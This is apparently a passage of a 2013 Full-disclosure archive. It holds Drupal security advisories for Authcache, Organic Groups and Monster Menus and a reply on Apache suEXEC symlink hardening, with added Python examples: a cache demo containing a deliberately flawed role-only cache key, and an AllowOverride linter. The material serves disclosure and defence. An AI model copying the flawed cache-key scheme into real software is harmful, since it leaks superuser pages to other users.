     accordance with Drupal Security Team processes./

-------- VERSIONS AFFECTED ---------------------------------------------------

   * authcache 7.x-1.x versions prior to 7.x-1.5.

Drupal core is not affected. If you do not use the contributed Authenticated User Page Caching (Authcache) [4] module, there is nothing you need to do.

-------- SOLUTION ------------------------------------------------------------

Install the latest version:

   * If you use the authcache module for Drupal 7.x, upgrade to authcache 7.x-1.5 [5]

Also see the Authenticated User Page Caching (Authcache) [6] project page.

-------- REPORTED BY ---------------------------------------------------------

   * Lorenz Schori [7] the module maintainer

-------- FIXED BY ------------------------------------------------------------

   * Lorenz Schori [8] the module maintainer

-------- COORDINATED BY ------------------------------------------------------

   * Ben Jeavons [9] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION ----------------------------------------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10].

Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/authcache
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/authcache
[5] http://drupal.org/node/2058165
[6] http://drupal.org/project/authcache
[7] http://drupal.org/user/63999
[8] http://drupal.org/user/63999
[9] http://drupal.org/user/91990
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration
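The Authcache advisory is a cache-key problem: a bucket keyed on the role combination alone puts uid 1 in the same bucket as every other user with those roles. The following is an added example, in Python and not code from the Authcache module or its maintainer, of a minimal page cache with the role-only key beside a key function that keeps the superuser out of any shared bucket. The users, the rendered page text and the "superuser-only" marker are all constructed, and excluding uid 1 from caching is one possible mitigation, not a description of what the module's 7.x-1.5 fix does.

```python
# Constructed users: "admin" is uid 1 and happens to share alice's roles.
USERS = {
    "admin": {"uid": 1, "roles": ("authenticated", "editor")},
    "alice": {"uid": 42, "roles": ("editor", "authenticated")},
    "bob": {"uid": 43, "roles": ("authenticated",)},
}


def render(path, user):
    """Stand-in for Drupal's page render: uid 1 gets extra, privileged content."""
    body = path + " for roles " + ",".join(sorted(user["roles"]))
    if user["uid"] == 1:
        body += " [superuser-only: site status report]"
    return body


class PageCache:
    """Serve a page from the bucket named by key_fn; None means never cache."""

    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.store = {}
        self.hits = 0

    def get(self, path, user):
        key = self.key_fn(path, user)
        if key is None:
            return render(path, user)
        if key in self.store:
            self.hits += 1
            return self.store[key]
        page = render(path, user)
        self.store[key] = page
        return page


def role_key(path, user):
    """The flawed scheme: one bucket per (path, role combination)."""
    return (path, tuple(sorted(user["roles"])))


def safe_role_key(path, user):
    """Mitigation: the superuser neither populates nor reads a shared bucket."""
    if user["uid"] == 1:
        return None
    return role_key(path, user)


def leaked_to(user_name, key_fn, path="/dashboard"):
    """True if user_name is served the page rendered for uid 1."""
    cache = PageCache(key_fn)
    cache.get(path, USERS["admin"])  # superuser visits first and warms the cache
    return "superuser-only" in cache.get(path, USERS[user_name])


if __name__ == "__main__":
    for key_fn in (role_key, safe_role_key):
        for name in ("alice", "bob"):
            print(key_fn.__name__, name, "leaked" if leaked_to(name, key_fn) else "ok")
```

Note that bob is safe even under the flawed key only because his role set differs; the advisory's mitigating factor is exactly that coincidence of roles, and a safe key function should not rely on it.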
[Full-disclosure] [Security-news] SA-CONTRIB-2013-065 - Organic Groups - Access Bypass
View online: https://drupal.org/node/2059765

   * Advisory ID: DRUPAL-SA-CONTRIB-2013-065
   * Project: Organic groups [1] (third-party module)
   * Version: 7.x
   * Date: 2013-August-07
   * Security risk: Critical [2]
   * Exploitable from: Remote
   * Vulnerability: Access bypass, Multiple vulnerabilities

-------- DESCRIPTION ---------------------------------------------------------

This module enables users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves.

The module allows any authenticated user to guess the node ID of private groups, and subscribe to them without approval, thus being able to see their content.

This vulnerability is mitigated by the fact that the permissions to subscribe are set to allow without approval.

Furthermore, misconfiguration of the OG access fields (a.k.a. visibility fields) could have led to nodes not being private even though a site admin would expect them to be private, due to the group default setting.

This vulnerability is mitigated by requiring a non-default configuration where the "Group visibility" field was not attached to the group node, and only the "Group content visibility" was attached to the group-content node.

-------- CVE IDENTIFIER(S) ISSUED --------------------------------------------

   * /A CVE identifier [3] will be requested, and added upon issuance, in
     accordance with Drupal Security Team processes./

-------- VERSIONS AFFECTED ---------------------------------------------------

   * OG 7.x-2.x versions prior to 7.x-2.3.

Drupal core is not affected. If you do not use the contributed Organic groups [4] module, there is nothing you need to do.

-------- SOLUTION ------------------------------------------------------------

Install the latest version:

   * If you use the Organic groups module for Drupal 7.x, upgrade to OG 7.x-2.3 [5]

Also see the Organic groups [6] project page.

-------- REPORTED BY ---------------------------------------------------------

   * Nic Ivy [7]
   * Hunter Fox [8] of the Drupal Security Team

-------- FIXED BY ------------------------------------------------------------

   * Amitai Burstein [9] the module maintainer
   * Roy Segall [10] from Gizra
   * Hunter Fox [11] of the Drupal Security Team

-------- COORDINATED BY ------------------------------------------------------

   * Hunter Fox [12] of the Drupal Security Team
   * David Stoline [13] of the Drupal Security Team

-------- CONTACT AND MORE INFORMATION ----------------------------------------

The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14].

Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17].

[1] http://drupal.org/project/og
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/og
[5] https://drupal.org/node/2059755
[6] http://drupal.org/project/og
[7] https://drupal.org/user/6194
[8] https://drupal.org/user/426416
[9] https://drupal.org/user/57511
[10] https://drupal.org/user/1812910
[11] https://drupal.org/user/426416
[12] https://drupal.org/user/426416
[13] https://drupal.org/user/329570
[14] http://drupal.org/contact
[15] http://drupal.org/security-team
[16] http://drupal.org/writing-secure-code
[17] http://drupal.org/security/secure-configuration
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
On 2013-08-07, at 09:08, king cope isowarez.isowarez.isowa...@googlemail.com wrote:

> SymLinksIfOwnerMatch will not help in this attack scenario because the .htaccess file overwrites this Options directive.

AllowOverride can be used to prevent this as well by specifying a set of values for Options which does not include FollowSymlinks, e.g.

AllowOverride AuthConfig FileInfo Indexes Limit Options=ExecCGI,Includes,Indexes,MultiViews,SymlinksIfOwnerMatch
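The mitigation in the reply above, an AllowOverride whose Options= list leaves out FollowSymLinks, as an added Python configuration check. This is example code written for this page, not code from the thread, from king cope or from the Apache project. It parses a constructed httpd.conf fragment, tracks the enclosing <Directory> section, and flags every AllowOverride that would let a .htaccess file switch FollowSymLinks back on: a bare All, a bare Options, or an Options= list that names FollowSymLinks (or All). The weak and hardened Directory blocks are constructed samples; the rules assume Apache's documented AllowOverride semantics.

```python
"""Flag AllowOverride settings that let .htaccess re-enable FollowSymLinks.

Added example for this thread, not Apache or the poster's code.  The
server-level 'Options SymLinksIfOwnerMatch' is only as strong as the
AllowOverride that guards it: if .htaccess may set Options freely, a
per-directory 'Options FollowSymLinks' overrides the server setting.
"""
import re
from dataclasses import dataclass

# Constructed sample: the weak setting and the corrected one side by side.
WEAK_CONF = """
<Directory "/var/www/vhosts">
    Options SymLinksIfOwnerMatch
    AllowOverride All
</Directory>
"""

HARDENED_CONF = """
<Directory "/var/www/vhosts">
    Options SymLinksIfOwnerMatch
    AllowOverride AuthConfig FileInfo Indexes Limit Options=ExecCGI,Includes,Indexes,MultiViews,SymlinksIfOwnerMatch
</Directory>
"""

DIRECTORY_OPEN = re.compile(r'^\s*<Directory\s+"?([^">]+?)"?\s*>', re.IGNORECASE)
DIRECTORY_CLOSE = re.compile(r'^\s*</Directory\s*>', re.IGNORECASE)
ALLOW_OVERRIDE = re.compile(r'^\s*AllowOverride\s+(.*?)\s*$', re.IGNORECASE)

# Options values that, if .htaccess may set them, defeat SymLinksIfOwnerMatch.
# 'all' is included conservatively because Options All covers FollowSymLinks.
RISKY_OPTIONS = {"followsymlinks", "all"}


@dataclass
class Finding:
    directory: str   # the <Directory> path the directive applies to
    directive: str   # the offending AllowOverride line, stripped
    reason: str      # why .htaccess could enable FollowSymLinks here


def overridable_options(args):
    """Return (unrestricted, allowed) for an AllowOverride argument string.

    unrestricted is True when .htaccess may set any Options value (bare
    'All' or bare 'Options'); otherwise allowed holds the lower-cased
    values named in Options=... lists (empty for 'None' or no Options grant).
    Apache directive arguments are case-insensitive, so everything is lowered.
    """
    allowed = set()
    for tok in args.split():
        low = tok.lower()
        if low in ("all", "options"):
            return True, set()
        if low.startswith("options="):
            allowed.update(v for v in low[len("options="):].split(",") if v)
    return False, allowed


def lint_allow_override(conf):
    """Scan an httpd.conf fragment and return a Finding for each AllowOverride
    that would let a .htaccess file turn FollowSymLinks on."""
    findings = []
    directory = "(server config)"
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # Apache comments are whole lines
            continue
        m = DIRECTORY_OPEN.match(line)
        if m:
            directory = m.group(1)
            continue
        if DIRECTORY_CLOSE.match(line):
            directory = "(server config)"
            continue
        m = ALLOW_OVERRIDE.match(line)
        if not m:
            continue
        unrestricted, allowed = overridable_options(m.group(1))
        if unrestricted:
            findings.append(Finding(directory, line,
                            ".htaccess may set any Options value, including FollowSymLinks"))
        elif allowed & RISKY_OPTIONS:
            findings.append(Finding(directory, line,
                            "Options= list lets .htaccess enable FollowSymLinks"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        hits = lint_allow_override(conf)
        print(f"{label}: {len(hits)} finding(s)")
        for f in hits:
            print(f"  {f.directory}: {f.directive}  <- {f.reason}")
```

Run it against a real configuration by reading the file into `lint_allow_override`; the hardened sample produces no findings because the Options= list names only the values the reply lists, while `AllowOverride All` is reported as unrestricted. The check only models the AllowOverride directive, so it does not replace reviewing the Options directives and any AllowOverrideList entries in the same sections.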
[Full-disclosure] [Security-news] SA-CONTRIB-2013-066 - Monster Menus - Multiple Vulnerabilities
View online: https://drupal.org/node/2059823

* Advisory ID: DRUPAL-SA-CONTRIB-2013-066
* Project: Monster Menus [1] (third-party module)
* Version: 6.x, 7.x
* Date: 2013-August-07
* Security risk: Moderately critical [2]
* Exploitable from: Remote
* Vulnerability: Access bypass

DESCRIPTION
-----------
Monster Menus enables you to create granular page permissions, and apply them to a hierarchical page structure. The mm_webform submodule enables you to assign permissions derived from Monster Menus to webform forms.

The module doesn't sufficiently filter titles entered into page settings and echoes the supplied title back to the next user editing the settings, thereby allowing a Cross Site Scripting attack (XSS).

This vulnerability is mitigated by the fact that an attacker must have the ability to add pages to the Monster Menus tree, and must also entice another user to edit the settings of a maliciously-crafted page.

The mm_webform submodule doesn't correctly prohibit users with only "Who can read data submitted to this webform" permission from deleting webform submissions, leading to an Access Bypass.

This vulnerability is mitigated by the fact that an attacker must have an active login which is permitted to read a webform's submissions.

CVE IDENTIFIER(S) ISSUED
------------------------
* /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./

VERSIONS AFFECTED
-----------------
* Monster Menus 6.x-6.x versions prior to 6.x-6.61.
* Monster Menus 7.x-1.x versions prior to 7.x-1.13.

Drupal core is not affected. If you do not use the contributed Monster Menus [4] module, there is nothing you need to do.

SOLUTION
--------
Install the latest version:

* If you use the Monster Menus module for Drupal 6.x, upgrade to Monster Menus 6.x-6.61 [5]
* If you use the Monster Menus module for Drupal 7.x, upgrade to Monster Menus 7.x-1.13 [6]

Also see the Monster Menus [7] project page.

REPORTED BY
-----------
* Five Colleges, Inc.

FIXED BY
--------
* Dan Wilga [8] the module maintainer

COORDINATED BY
--------------
* Greg Knaddison [9] of the Drupal Security Team

CONTACT AND MORE INFORMATION
----------------------------
The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13].

[1] http://drupal.org/project/monster_menus
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/monster_menus
[5] https://drupal.org/node/2059807
[6] https://drupal.org/node/2059805
[7] http://drupal.org/project/monster_menus
[8] http://drupal.org/user/56892
[9] http://drupal.org/user/36762
[10] http://drupal.org/contact
[11] http://drupal.org/security-team
[12] http://drupal.org/writing-secure-code
[13] http://drupal.org/security/secure-configuration